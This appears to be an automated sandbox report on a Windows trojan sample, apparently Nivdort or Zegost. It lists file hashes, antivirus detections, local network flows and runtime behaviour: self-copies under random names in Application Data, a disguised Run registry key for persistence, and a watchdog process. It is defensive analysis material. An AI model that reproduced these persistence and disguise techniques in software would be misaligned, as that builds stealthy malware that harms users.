Analysis Date: 2015-02-16 23:05:29

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section .text: md5: 7ba86b0a2da2cec3db1c251c081aaec8 sha1: 4fe20a7da4c15e7d9a242068dea78d762dc105e0 size: 296448
Section .rdata: md5: 9534f530d605c89bdb8a3cf61347f265 sha1: 39dc7b27d24082998d553ceff498b7de7921f6d8 size: 33792
Section (name not recorded in report): md5: 5b007f818902dd540a08b0eb10ac2784 sha1: dcba442b38f62c56a7a370dd29fa0d019272636e size: 94720
Timestamp: 2014-10-30 10:06:43
Packer: Microsoft Visual C++ ?.?
AV 360 Safe: no_virus
AV Alwil (avast): Malware-gen:Win32:Malware-gen
AV Arcabit (arcavir): Gen:Variant.Symmi.22722
AV Avira (antivir): BDS/Zegost.Gen4
AV CA (E-Trust Ino): no_virus
AV CAT (quickheal): Trojan.Dynamer.AC3
AV Dr. Web: no_virus
AV Eset (nod32): Win32/Agent.VNC
AV Frisk (f-prot): no_virus
AV Grisoft (avg): Win32/Cryptor
AV K7: Unwanted-Program ( 004a8e8a1 )
AV Microsoft Security Essentials: TrojanSpy:Win32/Nivdort.Z
AV MicroWorld (escan): Gen:Variant.Symmi.22722
AV VirusBlokAda (vba32): no_virus

Runtime Details:


↳ C:\malware.exe

Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Connections IP Computer Workstation ➝ C:\Documents and Settings\Administrator\Application Data\dqtkykseszpw\eyzncpmdc.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\dqtkykseszpw\eyzncpmdc.exe
Creates Process: C:\Documents and Settings\Administrator\Application Data\dqtkykseszpw\eyzncpmdc.exe

↳ C:\Documents and Settings\Administrator\Application Data\dqtkykseszpw\eyzncpmdc.exe

Creates File: C:\Documents and Settings\Administrator\Application Data\dqtkykseszpw\zcjnwfeuk.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\dqtkykseszpw\
Creates File: \Device\Afd\Endpoint
Creates Process: WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\dqtkykseszpw\eyzncpmdc.exe"

↳ WATCHDOGPROC "C:\Documents and Settings\Administrator\Application Data\dqtkykseszpw\eyzncpmdc.exe"

Network Details:
Flows TCP: 192.168.1.1:1031 ➝
Flows TCP: 192.168.1.1:1032 ➝
Flows TCP: 192.168.1.1:1033 ➝
Flows TCP: 192.168.1.1:1034 ➝
Flows TCP: 192.168.1.1:1035 ➝

Raw Pcap